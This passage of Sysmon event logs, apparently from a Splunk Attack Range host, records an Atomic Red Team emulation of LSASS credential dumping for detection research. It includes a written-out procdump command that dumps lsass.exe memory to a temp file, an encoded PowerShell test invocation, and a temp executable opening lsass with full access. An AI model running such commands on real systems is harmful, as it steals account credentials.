AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1801-000000008801}4404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDB-5FA1-1801-000000008801}4404C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAC74C3) 10341000x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1801-000000008801}4404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDB-5FA1-1801-000000008801}4404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd378a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd35fe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e55e2a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dcc1e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318853d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e014b8(wow64) 154100x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.298{D28789B6-7CDB-5FA1-1801-000000008801}4404C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.263{D28789B6-7CDB-5FA1-1701-000000008801}45724552C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.247{D28789B6-7CDA-5FA1-0C01-000000008801}1072C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe 534500x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.247{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe 13241300x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1031,T1050SetValue2020-11-03 15:52:59.247{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\StartDWORD (0x00000004) 824800x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.231{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe44840x00000161B50D082C-- 10341000x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.231{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.216{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe43000x00000161B50D082C-- 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.216{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.200{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe12680x00000161B50D082C-- 10341000x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.200{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.184{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe41560x00000161B50D082C-- 10341000x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.184{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.169{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe40360x00000161B50D082C-- 10341000x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 